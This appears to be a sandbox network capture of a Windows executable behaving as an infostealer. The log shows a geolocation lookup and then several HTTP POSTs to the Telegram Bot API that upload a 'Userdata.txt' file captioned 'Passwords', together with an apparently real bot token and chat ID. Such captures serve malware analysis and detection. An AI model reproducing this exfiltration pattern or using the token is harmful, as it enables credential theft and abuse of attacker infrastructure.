                                                                                                          2025-01-10 20:17:00 UTC1322INData Raw: 13 93 9a 5c ad 5f b1 90 67 f2 75 f9 f0 50 e5 a4 b0 b4 33 ef 56 c2 68 c7 8c 27 26 11 2f 0d 68 05 22 4f 85 80 35 22 76 cc af 96 29 f4 22 60 eb e6 e8 8f b6 0a 72 ea 1a e2 77 35 b3 98 eb 5b 33 5c de 5d 13 de 3a 67 bc 5c 65 61 0b 6c 66 55 9f be a8 0b 9b 5a 18 f2 bd d4 2f 68 9d 41 f3 34 76 9a 86 14 b2 ee c4 ad 2f 94 8f 19 0f 79 4c 81 37 72 c5 1a 0c d5 86 92 ca 41 f5 64 8f 46 4e 8c a4 11 ee 97 4b a2 0c 25 15 6b 8e 5b b3 eb bf 5e 2d 90 46 bf 1b 4f 12 b7 07 64 62 ac d6 5a 1a 34 73 a6 c3 f6 c2 ba 24 12 18 ae b2 4a d0 78 7e bf 14 bc e5 8a 96 46 80 0d a9 12 44 af 9e f9 58 f5 e3 7c 2b 0e cb 43 d2 9f dc 29 d9 f6 a7 85 c4 f2 a1 e9 86 1a 3d ad 73 64 f8 cb 05 85 0d 85 92 da 08 01 a3 35 27 1c f2 bf c3 ab 03 03 7c 0f 0a 61 1f 33 b7 2f 9a 01 08 d9 a3 75 09 1a ec 2f 2e a8 42
                                                                                                          Data Ascii: \_guP3Vh'&/h"O5"v)"`rw5[3\]:g\ealfUZ/hA4v/yL7rAdFNK%k[^-FOdbZ4s$Jx~FDX|+C)=sd5'|a3/u/.B
                                                                                                          2025-01-10 20:17:00 UTC1390INData Raw: 9a a9 a2 e5 40 78 6c f3 51 e6 bb 80 f7 09 68 a2 a2 ef b8 a9 49 61 1b ea 5a 8e bd 82 b7 ec 66 01 f0 26 a9 36 69 40 36 84 92 52 65 79 fa 77 cf fb 6c 6a 3a d1 06 0b f4 e3 e6 63 48 b8 b3 0e bb 5b e6 96 3e 35 56 32 3d 83 0f 79 72 23 60 f2 4e dc a5 bf 00 18 b3 ec 13 43 81 11 c7 e2 68 1c 8e fb a1 35 bc b2 38 70 e7 e7 de 72 ce fd e5 8b 76 38 55 84 d2 62 e6 b3 2e 41 e1 38 90 93 0a e5 84 3b 44 12 98 19 d2 9f 81 05 c9 f2 6e 9c f0 7e d8 bf 87 11 8f d6 eb 80 2f 5e cf 8a cf 6b 18 44 00 ec 23 97 38 64 aa 58 3e a2 40 02 b3 ef 2c 38 f1 16 e0 00 44 21 45 7c a6 d7 4e e2 73 00 86 ba e3 6f 60 00 d6 b1 c4 5c e1 49 bc b9 4a cd c6 da 51 e0 da 9d 40 c7 58 9d 5d b2 ac e0 1d b7 c4 80 e2 1d 6c 6d 8f d5 ce c8 e4 aa db e8 77 09 57 08 d1 94 73 41 fa 25 59 a4 ec 71 ea 98 12 00 2f 2f 69
                                                                                                          Data Ascii: @xlQhIaZf&6i@6Reywlj:cH[>5V2=yr#`NCh58prv8Ub.A8;Dn~/^kD#8dX>@,8D!E|Nso`\IJQ@X]lmwWsA%Yq//i
                                                                                                          2025-01-10 20:17:00 UTC1390INData Raw: 45 f7 4a da 4f b6 42 f1 14 76 48 52 6e c7 cf bb ac cb 1b 70 ac ad 41 b3 34 ab a3 0e 21 e7 2c 56 76 e0 95 12 de 97 ff 01 c8 cb ef af e9 fb cc 9e 8d b4 84 f4 0b 68 75 3e b7 0b 3b d6 1f 66 68 9f d2 11 14 4b ef aa 25 e0 83 f0 1b 03 7a ca e6 19 44 39 13 1a f7 2f 4b 25 c9 d0 09 6d 2c 51 cd a6 26 67 e4 e7 f8 1a 0e 4c 5d 01 d9 c6 bd 7f 60 06 b4 7d a7 78 3b 3c e1 04 f1 98 96 39 77 c0 b6 0b 65 9c b4 51 00 14 bc 0c 47 7b 73 a4 de 84 3d 21 ea a1 60 0b cd 8c 6a 2b d1 75 df 97 5e 5d 8e 82 16 3b d6 b9 59 12 f8 29 45 91 be 8c bc e3 2d 22 30 e2 ee c2 4b 65 01 88 d8 48 d3 94 4c 1c e1 fb 7a dc ae 84 c4 72 e9 8a 81 00 94 a6 8d 40 66 d2 dd e5 72 b3 6c ff ec fa 96 ab be 6e 50 c6 fd 3b cc c6 49 c3 11 27 5f 6f dc 16 07 17 ea de cf 5e 7b e9 6d e1 c0 c0 32 77 63 c6 4e 3e 24 5b b6
                                                                                                          Data Ascii: EJOBvHRnpA4!,Vvhu>;fhK%zD9/K%m,Q&gL]`}x;<9weQG{s=!`j+u^];Y)E-"0KeHLzr@frlnP;I'_o^{m2wcN>$[
                                                                                                          2025-01-10 20:17:00 UTC1390INData Raw: 6e 4b 96 ee 47 5a 34 12 03 09 ed 5d 6b 8f a0 78 ae 6e 64 44 83 11 5d 97 f6 d4 b2 6b a5 2f ca ef a4 d1 d8 df d8 47 68 8c f1 c4 70 c8 52 89 b1 eb 2b c9 cf df f5 b3 1c 0b ad b3 af 89 6f f4 82 47 16 32 e8 97 f8 85 ec 06 10 98 dc 1d 45 29 f2 49 9a 31 fc 52 05 cf 06 c4 97 1f ec 13 a6 29 0a 3a 21 8b 93 8a 77 2c 2b 93 01 8b 3d 74 ab 63 c5 24 37 8a b5 e5 37 f4 08 6e 12 53 e4 26 b5 5a d8 1e d6 e9 3f 99 9f 7e c9 80 2a 9d f5 b1 1c c3 74 98 db 04 15 2f b0 63 18 29 1d 8f 6b 56 a9 d0 43 b9 7b b5 6b 85 9b 1d d2 99 6e 28 f0 bd e6 9d c4 57 da 41 90 76 79 cb 9a 75 e9 46 d6 c3 fd 5b 74 aa d8 27 c9 8b 0a 59 51 37 95 08 68 89 a8 d6 76 d0 ae ac 5a ea 6b 4a 14 d6 86 53 b8 4b 09 5b 56 e3 8c 15 a4 ab 13 58 20 2c a4 13 94 f4 80 6f 0c 62 1f b3 5f 13 18 0c 87 a7 b0 27 33 b2 92 36 7b
                                                                                                          Data Ascii: nKGZ4]kxndD]k/GhpR+oG2E)I1R):!w,+=tc$77nS&Z?~*t/c)kVC{kn(WAvyuF[t'YQ7hvZkJSK[VX ,ob_'36{
                                                                                                          2025-01-10 20:17:00 UTC1390INData Raw: 80 c8 70 a9 39 ac 42 a6 37 62 8a 03 b0 fa f4 e0 89 4c 7b de f4 1d a2 22 ea 5a 80 9f cd d8 0a 22 90 67 fc 05 db 96 1b 95 8c fa 9c e2 e5 5c c8 13 a5 74 27 22 1e 32 08 2a 09 23 4f 81 84 3d be 76 cc ad b2 f3 86 78 76 eb 94 82 d3 df 77 39 cc 12 89 a6 37 c8 d3 fc 81 24 72 19 4e 14 ec 50 2a bc 5c 69 70 0c 34 0e 49 9f dd f7 dc 9b c0 1e ff b5 e1 28 1a f2 5d f1 3f 5f 4f 86 10 ca ae c0 a5 34 bb a9 85 13 73 36 e8 f1 76 d4 18 33 dd 95 ec a4 d2 f5 60 a1 86 46 9d a6 3d ad 91 61 da 47 25 1f 00 f4 09 b3 e1 da 73 78 90 4c 9d 84 48 01 b4 05 68 5f a8 c0 df 51 27 79 b3 e1 33 3c bb 3d 19 09 a5 9c 27 b0 d2 7e bb 60 fe e0 e5 c3 6e d4 07 b8 11 60 32 8d ff 4f e0 ca 71 29 75 a8 63 d2 b3 5e fa d9 fc a5 94 c3 80 3f 8e ca 6a 52 7c 0d 37 fe a4 50 ad 59 8f ba 6c 05 08 b6 21 33 1b cf b6
                                                                                                          Data Ascii: p9B7bL{"Z"g\t'"2*#O=vxvw97$rNP*\ip4I(]?_O4s6v3`F=aG%sxLHh_Q'y3<='~`n`2Oq)uc^?jR|7PYl!3
                                                                                                          2025-01-10 20:17:00 UTC1390INData Raw: c0 fd 7e d0 52 b9 6a 3c 75 30 12 97 86 db f0 38 1a 9d bd b3 4a e4 a9 79 4d 71 31 3c 87 14 12 5e 6c 60 f8 2b 59 ab bf 0a 34 27 fe 11 6d 4f 18 d6 e1 6f e7 9e ed 86 b5 68 ab d4 73 0a fa c3 79 e2 f0 a2 20 76 38 55 95 0b 0d 92 b1 2e 4b da 30 a8 06 0a e7 82 35 41 68 0f 19 f6 bf 81 2d 63 e9 5e 9c f8 25 dc cd 1b 21 8f a6 95 55 5c 87 c9 e5 9a 60 02 c3 17 50 23 96 1b 61 dd 92 3a a6 42 42 93 f8 2e c8 cc 97 90 a2 6b 2f c9 7d a1 d2 4c a2 53 19 84 b2 dd ee 10 a2 d0 b3 29 5b a4 d7 21 a8 46 e0 ae d1 a2 01 da 9d 4b 90 74 f9 bb d6 c3 4f bf 92 d9 2b 65 2f 0a c1 a3 c0 c4 ca ab 99 c2 89 1c 74 72 12 a9 70 43 59 f4 59 7c bf f7 06 ac aa 0e 02 6e d0 69 5f 72 13 cf 9f dd 98 4c ce e7 56 31 b8 13 65 97 c5 4f 30 fe 01 5a aa aa 1b c6 32 51 85 a2 ed 25 92 bb 27 d0 6c de 1b a9 20 42 1d
                                                                                                          Data Ascii: ~Rj<u08JyMq1<^l`+Y4'mOohsy v8U.K05Ah-c^%!U\`P#a:BB.k/}LS)[!FKtO+e/trpCYY|ni_rLV1eO0Z2Q%'l B
                                                                                                          2025-01-10 20:17:00 UTC1390INData Raw: 57 ec 8b d3 63 a5 35 8e e3 d7 11 64 3d a6 04 5a 24 0b 68 6a dd e0 90 64 63 ab bc db e9 cf f2 06 03 6f 95 5b 04 c9 0c 00 08 e7 18 32 a6 2f c4 03 aa 9d 67 cb bc 93 98 eb 43 59 56 0e 3c fe 37 d4 c1 aa c8 37 fe c3 3b c2 6b 5d 8f d6 0e f4 8b 25 0f 04 40 7d 29 6f ca 07 6d b6 85 9c d6 54 76 0d 55 df 97 2e 21 f0 9a 37 1a d4 aa ec 32 c2 6d db bc 5b 4c 9e 86 d8 28 c0 bb 49 d9 ed 0d b3 7c 5a 4b 8a e1 f3 32 04 de cc d9 da 70 32 b7 cf 71 95 85 57 87 20 84 55 f8 fe 8c d5 69 78 95 bc fe 86 b0 73 41 1a d2 cb f6 04 a3 70 ec e1 eb 8b 92 03 6f 50 c7 f7 1d db d8 24 d6 00 3c fd 47 18 07 07 02 e5 e9 06 40 69 fc 37 17 e3 c0 48 77 63 c6 4e 3e 3d 4d c2 e8 b5 74 0f 17 22 7c 8d dd 7f 88 ca 12 a1 67 6f fc 61 af b9 86 5c 68 7e 2f f3 a4 4f dd fa b8 7d 15 d2 a8 d4 9f 90 36 18 80 ac 66
                                                                                                          Data Ascii: Wc5d=Z$hjdco[2/gCYV<77;k]%@})omTvU.!72m[L(I|ZK2p2qW UixsApoP$<G@i7HwcN>=Mt"|goa\h~/O}6f
                                                                                                          2025-01-10 20:17:00 UTC1390INData Raw: b8 a4 d7 94 c3 12 c2 d9 58 bf bd 1c 22 f3 b4 87 7b b1 f4 88 7b a9 2f e5 9e eb 80 fd 03 2f 91 c8 0e 16 28 ca 94 f0 30 fc 52 67 2d 1d c4 a3 01 9f eb bd 19 04 3d 75 70 93 8a 4e 04 d0 82 01 9e 32 5a 62 65 aa d2 45 13 9a f6 4f f7 05 7f 1a 36 90 26 b3 78 08 24 d6 e3 3e 8d af 29 c1 f4 b7 9b 86 67 0f c9 63 9e bc 8b 4f 33 ba 00 7c ea 16 9c 61 61 ad 93 89 a8 71 dc 82 5f 88 11 d3 e5 96 10 e7 b6 89 9d cd 46 d7 1b 92 6a 79 b1 f9 a0 e9 46 c1 c6 9a ca 73 d8 ac 28 c4 ea 68 a1 e1 e9 84 0a 64 f4 a8 d1 04 4d 9e a1 3b 8d cb 5b 14 d0 94 39 a8 4e 21 c2 56 3f 82 88 c5 a1 c1 63 b9 3d 5a 9d cc f4 8a 01 1b 64 17 a2 21 11 0f 04 03 e6 3f fd 1b d2 81 3f 60 23 31 a8 23 2d 12 3a b5 a0 e3 c3 35 d6 58 00 ce b4 31 6c 26 44 fa 94 8d 59 80 36 c5 8e b5 cf 8e de 2b cf c3 a8 89 bf 46 59 ac 10
                                                                                                          Data Ascii: X"{{//(0Rg-=upN2ZbeEO6&x$>)gcO3|aaq_FjyFs(hdM;[9N!V?c=Zd!??`#1#-:5X1l&DY6+FY


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          2192.168.2.849843104.21.48.14435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:03 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                          Host: reallyfreegeoip.org
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:17:03 UTC861INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 10 Jan 2025 20:17:03 GMT
                                                                                                          Content-Type: text/xml
                                                                                                          Content-Length: 362
                                                                                                          Connection: close
                                                                                                          Age: 1855012
                                                                                                          Cache-Control: max-age=31536000
                                                                                                          cf-cache-status: HIT
                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=097kpYYyZ%2FoY8A8Gb%2F6jbDzv8ayr8F4%2BAy7puvlsojvcKw2RlW0C2f7brKdU2L%2B%2BQnGb7A8L57uE2S2koSB53VLSfuCL1QoJXLP5NirYYaF0gvscFWmhegRFUaZT%2FLHUp7Cd0LW4"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8fff592ebeb88c15-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1835&rtt_var=701&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1591280&cwnd=238&unsent_bytes=0&cid=198668ca285f2dab&ts=186&x=0"
                                                                                                          2025-01-10 20:17:03 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          3192.168.2.849877149.154.167.2204435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:10 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd3189d99afcd2
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:17:10 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 38 39 64 39 39 61 66 63 64 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd3189d99afcd2Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:17:10 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:17:10 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:17:10 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 30 32 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43540,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736540230,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          4192.168.2.849893149.154.167.2204435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:12 UTC296OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31a02bcc4d72
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          Connection: Keep-Alive
                                                                                                          2025-01-10 20:17:12 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 61 30 32 62 63 63 34 64 37 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31a02bcc4d72Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:17:12 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:17:12 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:17:12 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 30 32 33 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43541,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736540232,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          5192.168.2.849906149.154.167.2204435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:13 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31b5093108a8
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:17:13 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 62 35 30 39 33 31 30 38 61 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                          Data Ascii: --===============8dd31b5093108a8Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                          2025-01-10 20:17:14 UTC388INHTTP/1.1 200 OK
                                                                                                          Server: nginx/1.18.0
                                                                                                          Date: Fri, 10 Jan 2025 20:17:14 GMT
                                                                                                          Content-Type: application/json
                                                                                                          Content-Length: 543
                                                                                                          Connection: close
                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                          Access-Control-Allow-Origin: *
                                                                                                          Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                          Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                          2025-01-10 20:17:14 UTC543INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 33 35 34 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 31 36 32 39 31 35 38 34 37 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 54 5a 53 55 52 45 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 33 38 32 38 30 39 30 39 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 68 6f 73 74 74 74 74 74 74 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 67 68 6f 6f 7a 7a 7a 7a 74 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 30 32 33 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e
                                                                                                          Data Ascii: {"ok":true,"result":{"message_id":43542,"from":{"id":7162915847,"is_bot":true,"first_name":"GTZSURE","username":"GTZSURE_bot"},"chat":{"id":7382809095,"first_name":"Ghostttttt","username":"ghoozzzzt","type":"private"},"date":1736540234,"document":{"file_n


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          6192.168.2.849918149.154.167.2204435060C:\Users\user\Desktop\ajRZflJ2ch.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2025-01-10 20:17:15 UTC272OUTPOST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                          Content-Type: multipart/form-data; boundary================8dd31c9d79a2386
                                                                                                          Host: api.telegram.org
                                                                                                          Content-Length: 1090
                                                                                                          2025-01-10 20:17:15 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 63 39 64 37 39 61 32 33 38 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
